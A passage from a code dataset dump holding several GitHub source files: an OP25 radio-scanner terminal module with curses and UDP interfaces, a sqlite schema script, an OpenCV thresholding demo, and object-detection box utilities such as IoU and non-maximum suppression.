input_file.read()\n print(\"Fetching file...\")\n print(file_content)\n print(\"Ready!\")\n search()\n except Exception as e: \n print(\"ERROR:\", e) \nmain() ","repo_name":"thesliceline/Cantina","sub_path":"JSONParser.py","file_name":"JSONParser.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72794566216","text":"\"true\" '''\\'\nDEFAULT_PYTHON2=/usr/bin/python\nDEFAULT_PYTHON3=/usr/bin/python3\nif [ -f op25_python ]; then\n OP25_PYTHON=$(cat op25_python)\nelse\n OP25_PYTHON=\"/usr/bin/python\"\nfi\n\nif [ -x $OP25_PYTHON ]; then\n echo Using Python $OP25_PYTHON >&2\n exec $OP25_PYTHON \"$0\" \"$@\"\nelif [ -x $DEFAULT_PYTHON2 ]; then\n echo Using Python $DEFAULT_PYTHON2 >&2\n exec $DEFAULT_PYTHON2 \"$0\" \"$@\"\nelif [ -x $DEFAULT_PYTHON3 ]; then\n echo Using Python $DEFAULT_PYTHON3 >&2\n exec $DEFAULT_PYTHON3 \"$0\" \"$@\"\nelse\n echo Unable to find Python >&2\nfi\nexit 127\n'''\nimport sys\nimport curses\nimport curses.textpad\nimport time\nimport json\nimport threading\nimport traceback\nimport socket\n\nfrom gnuradio import gr\n\nKEEPALIVE_TIME = 3.0 # no data received in (seconds)\n\nclass q_watcher(threading.Thread):\n def __init__(self, msgq, callback, **kwds):\n threading.Thread.__init__ (self, **kwds)\n self.setDaemon(1)\n self.msgq = msgq\n self.callback = callback\n self.keep_running = True\n self.start()\n\n def run(self):\n while(self.keep_running):\n if not self.msgq.empty_p():\n msg = self.msgq.delete_head()\n if msg is not None:\n self.callback(msg)\n else:\n self.keep_running = False\n else:\n time.sleep(0.1)\n\nclass curses_terminal(threading.Thread):\n def __init__(self, input_q, output_q, sock=None, **kwds):\n threading.Thread.__init__ (self, **kwds)\n self.setDaemon(1)\n self.input_q = input_q\n self.output_q = output_q\n self.keep_running = True\n self.last_update = 0\n self.auto_update = True\n self.current_nac = None\n self.current_sysname = None\n self.current_srcaddr = 0\n self.current_encrypted = 0\n self.current_msgqid = '0'\n self.channel_list = []\n self.default_channel = None\n self.capture_active = False\n self.hold_tgid = 0\n self.maxx = 0\n self.maxy = 0\n self.sock = sock\n self.sm_step = 100\n self.lg_step = 1200\n self.send_command('get_terminal_config', 0, 0)\n self.start()\n\n def get_terminal_type(self):\n return \"curses\"\n\n def setup_curses(self):\n self.stdscr = curses.initscr()\n self.stdscr.keypad(1)\n self.maxy, self.maxx = self.stdscr.getmaxyx()\n if (self.maxy < 6) or (self.maxx < 60):\n sys.stderr.write(\"Terminal window too small! Minimum size [70 x 6], actual [%d x %d]\\n\" % (self.maxx, self.maxy))\n sys.stdout.write(\"Terminal window too small! Minimum size [70 x 6], actual [%d x %d]\\n\" % (self.maxx, self.maxy))\n self.keep_running = False\n return\n\n curses.noecho()\n curses.halfdelay(1)\n\n self.title_bar = curses.newwin(1, self.maxx, 0, 0)\n self.help_bar = curses.newwin(1, self.maxx, self.maxy-1, 0)\n self.top_bar = curses.newwin(1, self.maxx, 1, 0)\n self.freq_list = curses.newwin(self.maxy-5, self.maxx, 2, 0)\n self.active1 = curses.newwin(1, self.maxx-15, self.maxy-3, 0)\n self.active2 = curses.newwin(1, self.maxx-15, self.maxy-2, 0)\n self.status1 = curses.newwin(1, 15, self.maxy-3, self.maxx-15)\n self.status2 = curses.newwin(1, 15, self.maxy-2, self.maxx-15)\n self.prompt = curses.newwin(1, 10, self.maxy-1, 0)\n self.text_win = curses.newwin(1, 11, self.maxy-1, 10)\n self.textpad = curses.textpad.Textbox(self.text_win)\n self.stdscr.refresh()\n\n self.title_help()\n\n def resize_curses(self):\n self.maxy, self.maxx = self.stdscr.getmaxyx()\n \n if (self.maxx < 60) or (self.maxy < 6): # do not resize if window is now too small\n return \n\n self.stdscr.erase()\n\n self.title_bar.resize(1, self.maxx)\n self.help_bar.resize(1, self.maxx)\n self.help_bar.mvwin(self.maxy-1, 0)\n self.top_bar.resize(1, self.maxx)\n self.freq_list.resize(self.maxy-5, self.maxx)\n self.active1.resize(1, self.maxx-15)\n self.active1.mvwin(self.maxy-3, 0)\n self.active2.resize(1, self.maxx-15)\n self.active2.mvwin(self.maxy-2, 0)\n self.status1.resize(1, 15)\n self.status1.mvwin(self.maxy-3, self.maxx-15)\n self.status2.resize(1, 15)\n self.status2.mvwin(self.maxy-2, self.maxx-15)\n self.stdscr.refresh()\n\n self.title_help()\n\n def end_terminal(self):\n try:\n curses.endwin()\n except:\n pass\n\n def title_help(self):\n if self.capture_active:\n title_str = \"OP25 (symbol capture)\"\n else:\n title_str = \"OP25\"\n help_str = \"(f)req (h)old (s)kip (l)ock (W)list (B)list (q)uit (1-6)plot (,.<>)tune\"\n self.title_bar.erase()\n self.help_bar.erase()\n self.title_bar.addstr(0, 0, title_str.center(self.maxx-1, \" \"), curses.A_REVERSE)\n self.help_bar.addstr(0, 0, help_str.center(self.maxx-1, \" \"), curses.A_REVERSE)\n self.title_bar.refresh()\n self.help_bar.refresh()\n self.stdscr.move(1,0)\n self.stdscr.refresh()\n\n def do_auto_update(self):\n UPDATE_INTERVAL = 0.5 # sec.\n if not self.auto_update:\n return False\n if self.last_update + UPDATE_INTERVAL > time.time():\n return False\n self.last_update = time.time()\n return True\n\n def process_terminal_events(self):\n # return true signifies end of main event loop\n if curses.is_term_resized(self.maxy, self.maxx) is True:\n self.resize_curses()\n\n _ORD_C = ord('c')\n _ORD_S = ord('s')\n _ORD_L = ord('l')\n _ORD_H = ord('h')\n _ORD_R = ord('R')\n COMMANDS = {_ORD_S: 'skip', _ORD_L: 'lockout', _ORD_H: 'hold', _ORD_R: 'reload', _ORD_C: 'capture'}\n c = self.stdscr.getch()\n if c == ord('u') or self.do_auto_update():\n self.send_command('update', 0, int(self.current_msgqid))\n if c in list(COMMANDS.keys()):\n self.send_command(COMMANDS[c], 0, int(self.current_msgqid))\n elif c == ord('q'):\n return True\n elif c == ord('t'):\n if self.current_nac:\n self.send_command('add_default_config', int(self.current_nac), int(self.current_msgqid))\n elif c == ord('f'):\n self.prompt.addstr(0, 0, 'Frequency')\n self.prompt.refresh()\n self.text_win.erase()\n response = self.textpad.edit()\n self.prompt.erase()\n self.prompt.refresh()\n self.text_win.erase()\n self.text_win.refresh()\n self.title_help()\n try:\n freq = float(response)\n if freq < 10000:\n freq *= 1000000.0\n except:\n freq = None\n if freq:\n self.send_command('set_freq', freq, int(self.current_msgqid))\n elif c == ord('v'):\n self.prompt.addstr(0, 0, 'Log Level')\n self.prompt.refresh()\n self.text_win.erase()\n response = self.textpad.edit()\n self.prompt.erase()\n self.prompt.refresh()\n self.text_win.erase()\n self.text_win.refresh()\n self.title_help()\n try:\n dbglvl = int(response)\n if dbglvl < 0:\n dbglvl = 0\n except:\n dbglvl = None\n if dbglvl is not None and dbglvl >= 0:\n self.send_command('set_debug', dbglvl, int(self.current_msgqid))\n elif c == ord('H'):\n self.prompt.addstr(0, 0, 'Hold tgid')\n self.prompt.refresh()\n self.text_win.erase()\n response = self.textpad.edit()\n self.prompt.erase()\n self.prompt.refresh()\n self.text_win.erase()\n self.text_win.refresh()\n self.title_help()\n try:\n tgid = int(response)\n if (tgid < 0) or (tgid > 65535):\n tgid = 0\n except:\n tgid = 0\n if tgid:\n self.send_command('hold', tgid, int(self.current_msgqid))\n elif c == ord('W'):\n self.prompt.addstr(0, 0, 'W/L tgid ')\n self.prompt.refresh()\n self.text_win.erase()\n response = self.textpad.edit()\n self.prompt.erase()\n self.prompt.refresh()\n self.text_win.erase()\n self.text_win.refresh()\n self.title_help()\n try:\n tgid = int(response)\n if (tgid < 0) or (tgid > 65534):\n tgid = 0\n except:\n tgid = 0\n if tgid:\n self.send_command('whitelist', tgid, int(self.current_msgqid))\n elif c == ord('B'):\n self.prompt.addstr(0, 0, 'B/L tgid ')\n self.prompt.refresh()\n self.text_win.erase()\n response = self.textpad.edit()\n self.prompt.erase()\n self.prompt.refresh()\n self.text_win.erase()\n self.text_win.refresh()\n self.title_help()\n try:\n tgid = int(response)\n if (tgid < 0) or (tgid > 65534):\n tgid = 0\n except:\n tgid = 0\n if tgid:\n self.send_command('lockout', tgid, int(self.current_msgqid))\n elif c == ord(','):\n self.send_command('adj_tune', -self.sm_step, int(self.current_msgqid))\n elif c == ord('.'):\n self.send_command('adj_tune', self.sm_step, int(self.current_msgqid))\n elif c == ord('<'):\n self.send_command('adj_tune', -self.lg_step, int(self.current_msgqid))\n elif c == ord('>'):\n self.send_command('adj_tune', self.lg_step, int(self.current_msgqid))\n elif (c >= ord('1') ) and (c <= ord('6')):\n self.send_command('toggle_plot', (c - ord('0')), int(self.current_msgqid))\n elif c == ord('d'):\n self.send_command('dump_tgids', 0, int(self.current_msgqid))\n elif c == ord('D'):\n self.send_command('dump_tracking', 0, int(self.current_msgqid))\n elif c == ord('T'):\n self.send_command('set_tracking', -1, int(self.current_msgqid))\n elif c == ord('x'):\n assert 1 == 0\n elif c == curses.KEY_UP:\n pass\n elif c == curses.KEY_DOWN:\n pass\n elif c == curses.KEY_LEFT:\n self.change_chan(-1)\n elif c == curses.KEY_RIGHT:\n self.change_chan(+1)\n return False\n\n def change_chan(self, incr):\n if len(self.channel_list) == 0:\n return\n\n i = self.channel_list.index(self.current_msgqid) if self.current_msgqid in self.channel_list else 0\n i += incr\n if i >= len(self.channel_list):\n i = 0\n elif i < 0:\n i = len(self.channel_list) - 1\n self.current_msgqid = self.channel_list[i]\n\n def process_json(self, js):\n # return true signifies end of main event loop\n msg = json.loads(js)\n if msg['json_type'] == 'trunk_update':\n nacs = [x for x in list(msg.keys()) if x.isnumeric() ]\n if not nacs:\n return\n sysnames = {}\n for nac in nacs:\n if 'system' in msg[nac] and msg[nac]['system'] is not None:\n sysnames[msg[nac]['system']] = nac\n if self.current_sysname in sysnames:\n current_nac = str(sysnames[self.current_sysname])\n elif msg.get('nac'):\n current_nac = str(msg['nac'])\n else:\n times = {msg[nac]['last_tsbk']:nac for nac in nacs}\n current_nac = times[ sorted(list(times.keys()), reverse=True)[0] ]\n self.current_nac = current_nac\n s = str(msg[current_nac]['top_line'])\n freqs = sorted(msg[current_nac]['frequencies'].keys())\n s = s[:(self.maxx - 1)]\n self.top_bar.erase()\n self.top_bar.addstr(0, 0, s)\n self.top_bar.refresh()\n self.freq_list.erase()\n for i in range(len(freqs)):\n if i > (self.maxy - 6):\n break\n s=msg[current_nac]['frequencies'][freqs[i]]\n s = s[:(self.maxx - 1)]\n self.freq_list.addstr(i, 0, s)\n self.freq_list.refresh()\n if 'srcaddr' in msg:\n self.status1.erase()\n srcaddr = msg['srcaddr']\n if (srcaddr != 0) and (srcaddr != 0xffffff):\n s = '%d' % (srcaddr)\n s = s[:14]\n self.status1.addstr(0, (14-len(s)), s)\n self.current_srcaddr = srcaddr\n self.status1.refresh()\n if 'encrypted' in msg:\n encrypted = msg['encrypted']\n if self.current_encrypted != encrypted:\n self.status2.erase()\n if encrypted != 0:\n s = 'ENCRYPTED'\n self.status2.addstr(0, (14-len(s)), s, curses.A_REVERSE)\n self.status2.refresh()\n self.current_encrypted = encrypted\n self.stdscr.refresh()\n elif msg['json_type'] == 'change_freq': # from rx.py trunking\n s = 'Frequency %f' % (msg['freq'] / 1000000.0)\n if msg['fine_tune'] is not None:\n s +='(%d)' % msg['fine_tune']\n if msg['error'] is not None:\n s += '(%dHz)' % (msg['error'])\n if msg['tgid'] is not None:\n s += ' Talkgroup ID %s' % (msg['tgid'])\n if msg['tdma'] is not None:\n s += ' TDMA Slot %s' % msg['tdma']\n s = s[:(self.maxx - 16)]\n self.active1.erase()\n self.active2.erase()\n self.active1.addstr(0, 0, s)\n self.active1.refresh()\n s = \"\"\n if msg['tag']:\n s = msg['tag']\n s = s[:(self.maxx - 16)]\n self.active2.addstr(0, 0, s)\n self.active2.refresh()\n self.stdscr.refresh()\n elif msg['json_type'] == 'channel_update': # from multi_rx.py trunking\n if ('channels' not in msg) or (len(msg['channels']) == 0):\n return\n self.channel_list = msg['channels']\n\n # Pick the default channel if specified and this is the first update received.\n if self.default_channel is not None and self.default_channel != \"\":\n for ch_id in self.channel_list:\n if msg[ch_id]['name'] == self.default_channel:\n self.current_msgqid = ch_id\n break\n self.default_channel = None\n\n # Format and display the channel info\n c_id = self.current_msgqid if self.current_msgqid in self.channel_list else self.channel_list[0]\n if 'system' in msg[c_id] and msg[c_id]['system'] is not None:\n self.current_sysname = msg[c_id]['system']\n s = '[%s] %s ' % (c_id, msg[c_id]['name']) if len(msg[c_id]['name']) > 0 else '[%s] ' % (c_id)\n s += 'Frequency %f' % (msg[c_id]['freq'] / 1000000.0)\n if msg[c_id]['ppm'] is not None:\n s += '(%.3f)' % (msg[c_id]['ppm'])\n if msg[c_id]['error'] is not None:\n s += '(%dHz)' % (msg[c_id]['error'])\n if msg[c_id]['capture'] is not None:\n if msg[c_id]['capture'] != self.capture_active:\n self.capture_active = msg[c_id]['capture']\n self.title_help()\n if msg[c_id]['tgid'] is not None:\n s += ' Talkgroup ID %s' % (int(msg[c_id]['tgid']))\n if 'tdma' in msg[c_id] and msg[c_id]['tdma'] is not None:\n s += ' TDMA Slot %s' % int(msg[c_id]['tdma'])\n if 'hold_tgid' in msg[c_id] and msg[c_id]['hold_tgid'] is not None:\n s += ' [HOLD]'\n if 'mode' in msg[c_id]:\n mode = msg[c_id]['mode']\n if mode == 0:\n mode_str = \"Analog\"\n elif mode == 1:\n mode_str = \"Digital\"\n else:\n mode_str = \"\"\n s += \" %s\" % mode_str\n s = s[:(self.maxx - 16)]\n self.active1.erase()\n self.active2.erase()\n self.active1.addstr(0, 0, s)\n self.active1.refresh()\n s = \"\"\n if msg[c_id]['tag']:\n s = msg[c_id]['tag']\n s = s[:(self.maxx - 16)]\n self.active2.addstr(0, 0, s)\n self.active2.refresh()\n self.stdscr.refresh()\n if 'srcaddr' in msg[c_id]:\n srcaddr = msg[c_id]['srcaddr']\n if 'srctag' in msg[c_id]:\n srctag = msg[c_id]['srctag']\n else:\n srctag = \"\"\n if srcaddr == 0xffffffff:\n srcaddr = 0\n if self.current_srcaddr != srcaddr:\n self.status1.erase()\n if srctag != \"\":\n s = srctag[:14]\n self.status1.addstr(0, (14-len(s)), s)\n elif srcaddr != 0:\n s = '%d' % (srcaddr)\n s = s[:14]\n self.status1.addstr(0, (14-len(s)), s)\n self.current_srcaddr = srcaddr\n self.status1.refresh()\n if 'encrypted' in msg[c_id]:\n encrypted = msg[c_id]['encrypted']\n if self.current_encrypted != encrypted:\n self.status2.erase()\n if encrypted != 0:\n s = 'ENCRYPTED'\n self.status2.addstr(0, (14-len(s)), s, curses.A_REVERSE)\n self.status2.refresh()\n self.current_encrypted = encrypted\n elif msg['json_type'] == 'terminal_config': # from multi_rx.py\n if 'tuning_step_small' in msg and int(msg['tuning_step_small']) > 0:\n self.sm_step = int(msg['tuning_step_small'])\n if 'tuning_step_large' in msg and int(msg['tuning_step_large']) > 0:\n self.lg_step = int(msg['tuning_step_large'])\n if 'default_channel' in msg and str(msg['default_channel']) != \"\":\n self.default_channel = str(msg['default_channel'])\n \n return False\n\n def process_q_events(self):\n # return true signifies end of main event loop\n while True:\n if curses.is_term_resized(self.maxy, self.maxx) is True:\n self.resize_curses()\n if self.input_q.empty_p():\n break\n msg = self.input_q.delete_head_nowait()\n if msg.type() == -4:\n return self.process_json(msg.to_string())\n return False\n\n def send_command(self, command, arg1 = 0, arg2 = 0):\n if self.sock:\n js = json.dumps({'command': command, 'arg1': arg1, 'arg2': arg2})\n if sys.version[0] > '2':\n if type(js) is str:\n js = js.encode()\n self.sock.send(js)\n else:\n msg = gr.message().make_from_string(command, -2, arg1, arg2)\n if not self.output_q.full_p():\n self.output_q.insert_tail(msg)\n\n def run(self):\n try:\n self.setup_curses()\n\n while(self.keep_running):\n if self.process_terminal_events():\n break\n if self.process_q_events():\n break\n except:\n sys.stderr.write('terminal: exception occurred (%d, %d)\\n' % (self.maxx, self.maxy))\n sys.stderr.write('terminal: exception:\\n%s\\n' % traceback.format_exc())\n finally:\n self.end_terminal()\n self.keep_running = False\n self.send_command('quit', 0)\n\nclass http_terminal(threading.Thread):\n def __init__(self, input_q, output_q, endpoint, **kwds):\n from http_server import http_server\n\n threading.Thread.__init__ (self, **kwds)\n self.setDaemon(1)\n self.input_q = input_q\n self.output_q = output_q\n self.endpoint = endpoint\n self.keep_running = True\n self.server = http_server(self.input_q, self.output_q, self.endpoint)\n self.start()\n\n def get_terminal_type(self):\n return \"http\"\n\n def end_terminal(self):\n self.keep_running = False\n\n def run(self):\n self.server.run()\n\nclass udp_terminal(threading.Thread):\n def __init__(self, input_q, output_q, port, **kwds):\n threading.Thread.__init__ (self, **kwds)\n self.setDaemon(1)\n self.input_q = input_q\n self.output_q = output_q\n self.keep_running = True\n self.port = port\n self.remote_ip = '127.0.0.1'\n self.remote_port = 0\n self.keepalive_until = 0\n\n self.setup_socket(port)\n self.q_handler = q_watcher(self.input_q, self.process_qmsg)\n self.start()\n\n def get_terminal_type(self):\n return \"udp\"\n\n def setup_socket(self, port):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.bind(('0.0.0.0', port))\n\n def process_qmsg(self, msg):\n if time.time() >= self.keepalive_until:\n return\n s = msg.to_string()\n if msg.type() == -4 and self.remote_port > 0:\n self.sock.sendto(s, (self.remote_ip, self.remote_port))\n\n def end_terminal(self):\n self.keep_running = False\n\n def run(self):\n while self.keep_running:\n data, addr = self.sock.recvfrom(2048)\n data = json.loads(data)\n if data['command'] == 'quit':\n self.keepalive_until = 0\n continue\n msg = gr.message().make_from_string(str(data['command']), -2, data['arg1'], data['arg2'])\n if not self.output_q.full_p():\n self.output_q.insert_tail(msg)\n self.remote_ip = addr[0]\n self.remote_port = addr[1]\n self.keepalive_until = time.time() + KEEPALIVE_TIME\n\ndef op25_terminal(input_q, output_q, terminal_type):\n if terminal_type == 'curses':\n return curses_terminal(input_q, output_q)\n elif terminal_type[0].isdigit():\n port = int(terminal_type)\n return udp_terminal(input_q, output_q, port)\n elif terminal_type.startswith('http:'):\n return http_terminal(input_q, output_q, terminal_type.replace('http:', ''))\n else:\n sys.stderr.write('warning: unsupported terminal type: %s\\n' % terminal_type)\n return None\n\nclass terminal_client(object):\n def __init__(self):\n self.input_q = gr.msg_queue(10)\n self.keep_running = True\n self.terminal = None\n\n ip_addr = sys.argv[1]\n port = int(sys.argv[2])\n\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.connect((ip_addr, port))\n self.sock.settimeout(0.1)\n\n self.terminal = curses_terminal(self.input_q, None, sock=self.sock)\n\n def run(self): \n while self.keep_running:\n try:\n js, addr = self.sock.recvfrom(2048)\n msg = gr.message().make_from_string(js, -4, 0, 0)\n if not self.input_q.full_p():\n self.input_q.insert_tail(msg)\n except socket.timeout:\n pass\n except:\n raise\n if not self.terminal.keep_running:\n self.keep_running = False\n\nif __name__ == '__main__':\n terminal = None\n try:\n terminal = terminal_client()\n terminal.run()\n except:\n sys.stderr.write('terminal: exception occurred\\n')\n sys.stderr.write('terminal: exception:\\n%s\\n' % traceback.format_exc())\n finally:\n if terminal is not None and terminal.terminal is not None:\n terminal.terminal.end_terminal()\n","repo_name":"boatbod/op25","sub_path":"op25/gr-op25_repeater/apps/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":24377,"program_lang":"python","lang":"en","doc_type":"code","stars":271,"dataset":"github-code","pt":"45"} +{"seq_id":"35217623700","text":"import sqlite3\nimport os\n\nDIRPATH = os.path.dirname(__file__)\nDBFILENAME = \"company.db\"\nDBPATH = os.path.join(DIRPATH, DBFILENAME)\n\ndef schema(DBPATH):\n with sqlite3.connect(DBPATH) as conn:\n cur = conn.cursor()\n\n SQL = \"DROP TABLE IF EXISTS branches;\"\n cur.execute(SQL)\n\n SQL = \"\"\"CREATE TABLE branches(\n pk INTEGER PRIMARY KEY AUTOINCREMENT,\n city VARCHAR(128),\n state VARCHAR (128)\n );\"\"\"\n cur.execute(SQL)\n\n SQL = \"DROP TABLE IF EXISTS employees;\"\n cur.execute(SQL)\n\n SQL = \"\"\"CREATE TABLE employees(\n pk INTEGER PRIMARY KEY AUTOINCREMENT,\n first_name VARCHAR(128),\n last_name VACHAR(128),\n id_num VARCHAR(6),\n is_manager VARCHAR (3),\n branch_pk INTERGER (128),\n FOREIGN KEY (branch_pk) REFERENCES branches(pk)\n );\"\"\"\n cur.execute(SQL)\n\n\nif __name__ == \"__main__\":\n schema(DBPATH)","repo_name":"NWood-Git/quiz_12_2_2019","sub_path":"schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"71821686857","text":"import cv2\r\n\r\n#==> Images\r\nimg1=cv2.imread('book1.jpg',cv2.IMREAD_COLOR); #image read in color\r\nimg2=cv2.imread('book2.jpg',cv2.IMREAD_COLOR); #image read in normal color\r\nimg3=cv2.imread('book3.jpg',cv2.IMREAD_COLOR); #image in normal color\r\n\r\n#==.Convert image to gray scale\r\ngray_img=cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY); #convert color from bgr 2 gray\r\n\r\nblur_img=cv2.medianBlur(gray_img,5); #median blur image by 5\r\n\r\nmean=cv2.adaptiveThreshold(blur_img,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,21,2); #create an adaptive thhershold with mean adaptive method\r\n\r\ngaussian=cv2.adaptiveThreshold(blur_img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,21,2); #create an adaptive threshold wit gaussian adaptive method\r\n\r\ncv2.namedWindow('mean',cv2.WINDOW_NORMAL); #create a named window\r\ncv2.imshow('mean',mean); #Image show in window\r\n\r\ncv2.namedWindow('Gaussian',cv2.WINDOW_NORMAL); #create a named window\r\ncv2.imshow('Gaussian',gaussian); #Image show in window\r\nif cv2.waitKey(0)&0xFF==ord('q'):\r\n cv2.destroyWindow('mean'); #destroy window mean\r\n cv2.destroyWindow('Gaussian'); #destoy window Gaussian\r\n","repo_name":"Chidalu567/Django-Full-completetion","sub_path":"Open cv project/1.4 in reader opencv/Image Thresholding/Adaptive thresholding.py","file_name":"Adaptive thresholding.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"18598257566","text":"import numpy as np\nimport cv2\nimport torch\n\n\ndef prep_im_for_blob(im, pixel_means, pixel_stds, target_sizes, max_size):\n \"\"\"\n Prepare an image for use as a network input blob, specially:\n - Subtract per-channel pixel mean\n - Convert to float32\n - Rescale to each of the specified target size (capped at max_size)\n :param im: the image ndarray\n :param pixel_means: image means for each channel\n :param pixel_stds: image stds for each channel\n :param target_sizes: the target size for rescale the image\n :param max_size: the max size of the longer side in the image\n :return:\n - A list of transformed images, one for each target size. Also returns the scale\n factors that were used to compute each returned image.\n \"\"\"\n im = im.astype(np.float32, copy=False) / 255.0\n im -= pixel_means\n im /= pixel_stds\n im_shape = im.shape\n im_size_min = np.min(im_shape[0:2])\n im_size_max = np.max(im_shape[0:2])\n\n ims = []\n im_scales = []\n for target_size in target_sizes:\n im_scale = get_target_scale(im_size_min, im_size_max, target_size, max_size)\n im_resized = cv2.resize(im, None, None, fx=im_scale, fy=im_scale, interpolation=cv2.INTER_LINEAR)\n ims.append(im_resized)\n im_scales.append(im_scale)\n return ims, im_scales\n\n\ndef get_target_scale(im_size_min, im_size_max, target_size, max_size):\n \"\"\"\n Calculate target resize scale\n :param im_size_min: the shorter side of image\n :param im_size_max: the longer side of image\n :param target_size: target size\n :param max_size: max size for the longer side of image\n :return:\n - im_scale: the scale for rescale the image\n \"\"\"\n im_scale = float(target_size) / float(im_size_min)\n # prevent the biggest axis from being more than max_size\n if np.round(im_scale * im_size_max) > max_size:\n im_scale = float(max_size) / float(im_size_max)\n return im_scale\n\n\ndef im_list_to_blob(ims):\n \"\"\"\n Convert a list of images into a network input. Assumes images were\n prepared using prep_im_for_blob or equivalent: i.e.\n - BGR channel order\n - pixel means substracted\n - resized to the desired input size\n - float32 numpy ndarray format\n :param ims:\n :return:\n - a 4D NCHW tensor of the images concatenated along axis 0 with shape.\n \"\"\"\n if not isinstance(ims, list):\n ims = [ims]\n max_shape = get_max_shape([im.shape[:2] for im in ims])\n num_images = len(ims)\n blob = np.zeros((num_images, max_shape[0], max_shape[1], 3), dtype=np.float32)\n for i in range(num_images):\n im = ims[i]\n blob[i, 0:im.shape[0], 0:im.shape[1], :] = im\n # move channels (axis 3) to (axis 1)\n # axis order will become: (batch, channel, height, width)\n channel_swap = (0, 3, 1, 2)\n blob = blob.transpose(channel_swap)\n return blob\n\n\ndef get_max_shape(im_shapes):\n \"\"\"\n Calculate max spatial size (h, w) for batching given a list of image shapes\n :param im_shapes: list of np.array([h, w])\n :return: \n - max_shape: the max_shape in the list of images\n \"\"\"\n max_shape = np.array(im_shapes).max(axis=0)\n assert max_shape.size == 2\n # pad the image so they can be divisible by a stride\n stride = 32\n max_shape[0] = int(np.ceil(max_shape[0] / float(stride)) * stride)\n max_shape[1] = int(np.ceil(max_shape[1] / float(stride)) * stride)\n return max_shape\n\n\ndef meshgrid(x, y, row_major=True):\n \"\"\"\n Return meshgrid in range x & y\n :param x: (int) first dim range\n :param y: (int) second dim range\n :param row_major: (bool) row major or column major.\n :return: (tensor) meshgrid, sized [x*y, 2]\n\n Example:\n >> meshgrid(3, 2)\n 0 0\n 1 0\n 2 0\n 0 1\n 1 1\n 2 1\n [torch.FloatTensor of size 6x2]\n\n >> meshgrid(3, 2, row_major=False)\n 0 0\n 0 1\n 0 2\n 1 0\n 1 1\n 1 2\n [torch.FloatTensor of size 6x2]\n \"\"\"\n a = torch.arange(0, x)\n b = torch.arange(0, y)\n xx = a.repeat(y).view(-1, 1)\n yy = b.view(-1, 1).repeat(1, x).view(-1, 1)\n return torch.cat([xx, yy], 1) if row_major else torch.cat([yy, xx], 1)\n\n\ndef change_box_order(boxes, order):\n \"\"\"\n Change box order between (xmin, ymin, xmax, ymax) and (xcenter, ycenter, width, height).\n :param boxes: (tensor) bounding boxes, sized [N, 4]\n :param order: (str) either 'xyxy2xywh' or 'xywh2xyxy'.\n :return: (tensor) converted bounding boxes, size [N, 4]\n \"\"\"\n assert order in ['xyxy2xywh', 'xywh2xyxy']\n a = boxes[:, :2]\n b = boxes[:, 2:]\n if order == 'xyxy2xywh':\n return torch.cat([(a + b) / 2., b - a], 1)\n return torch.cat([a - b / 2., a + b / 2.], 1)\n\n\ndef box_iou(box1, box2, order='xyxy'):\n \"\"\"\n Compute the intersection over union of two set of boxes.\n The default box order is (xmin, ymin, xmax, ymax).\n :param box1: (tensor) bounding boxes, sized [N, 4]\n :param box2: (tensor) bounding boxes, sized [M, 4].\n :param order: (str) box order, either 'xyxy' or 'xywh'\n :return: (tensor) iou, sized [N, M]\n \"\"\"\n if order == 'xywh':\n box1 = change_box_order(box1, 'xywh2xyxy')\n box2 = change_box_order(box2, 'xywh2xyxy')\n\n N = box1.size(0)\n M = box2.size(0)\n\n lt = torch.max(box1[:, None, :2], box2[:, :2]) # [N, M, 2]\n rb = torch.min(box1[:, None, 2:], box2[:, 2:]) # [N, M, 2]\n\n wh = (rb - lt).clamp(min=0) # [N, M, 2]\n inter = wh[:, :, 0] * wh[:, :, 1] # [N, M]\n\n area1 = (box1[:, 2] - box1[:, 0]) * (box1[:, 3] - box1[:, 1]) # [N,]\n area2 = (box2[:, 2] - box2[:, 0]) * (box2[:, 3] - box2[:, 1]) # [N.]\n iou = inter / (area1[:, None] + area2 - inter)\n return iou\n\n\ndef box_nms(bboxes, scores, threshold=0.5, mode='union'):\n \"\"\"\n Non Maximum suppression.\n :param bboxes: (tensor) bounding boxes, size [N, 4]\n :param scores: (tensor) bbox scores, sized [N,].\n :param threshold: (float) overlap threshold\n :param mode: (str) 'union' or 'min'\n :return:\n keep: (tensor) selected indices.\n \"\"\"\n x1 = bboxes[:, 0]\n y1 = bboxes[:, 1]\n x2 = bboxes[:, 2]\n y2 = bboxes[:, 3]\n # import pdb; pdb.set_trace()\n\n areas = (x2 - x1) * (y2 - y1)\n _, order = scores.sort(0, descending=True)\n keep = []\n while order.numel() > 0:\n i = order[0]\n keep.append(i)\n\n if order.numel() == 1:\n break\n\n xx1 = x1[order[1:]].clamp(min=x1[i])\n yy1 = y1[order[1:]].clamp(min=y1[i])\n xx2 = x2[order[1:]].clamp(max=x2[i])\n yy2 = y2[order[1:]].clamp(max=y2[i])\n\n w = (xx2 - xx1).clamp(min=0)\n h = (yy2 - yy1).clamp(min=0)\n inter = w * h\n\n if mode == 'union':\n ovr = inter / (areas[i] + areas[order[1:]] - inter)\n elif mode == 'min':\n ovr = inter / areas[order[1:]].clamp(max=areas[i])\n else:\n raise TypeError('Unknown nms mode: %s.' % mode)\n\n ids = (ovr < threshold).nonzero().squeeze()\n if ids.numel() == 0:\n break\n # because the length of the ovr is less than the order by 1\n # so we have to add to ids to get the right one\n order = order[ids + 1]\n return torch.LongTensor(keep)\n\n\ndef one_hot_embedding(labels, num_classes):\n \"\"\"\n Embedding labels to one-hot form.\n\n Args:\n :param labels: (LongTensor) class label, sized [N,].\n :param num_classes: (int) number of classes.\n :return:\n (tensor) encoded labels, size [N, #classes].\n \"\"\"\n y = torch.eye(num_classes) # [D, D]\n return y[labels] # [N, 